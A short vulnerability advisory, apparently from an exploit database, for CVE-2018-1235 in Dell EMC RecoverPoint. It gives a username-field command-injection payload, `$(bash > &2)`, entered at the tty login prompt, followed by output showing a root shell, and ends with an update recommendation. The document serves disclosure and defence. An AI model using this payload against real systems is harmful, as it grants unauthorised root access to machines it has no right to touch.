- Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
- Date: 2018-06-21
- Vendor Advisory: DSA-2018-095
- Vendor KB: https://support.emc.com/kb/521234
- Exploit Author: Paul Taylor (@bao7uo) / Foregenix Ltd
- Github: https://github.com/bao7uo/dell-emc_recoverpoint
- Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
- Tested on: Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
- CVE: CVE-2018-1235
- Exploit-db: https://www.exploit-db.com/exploits/44920/
An OS command injection vulnerability exists in the mechanism which processes usernames which are presented for authentication, allowing unauthenticated root access via tty console login.
- Inject into local tty console login prompt
recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#
Update to latest version of RecoverPoint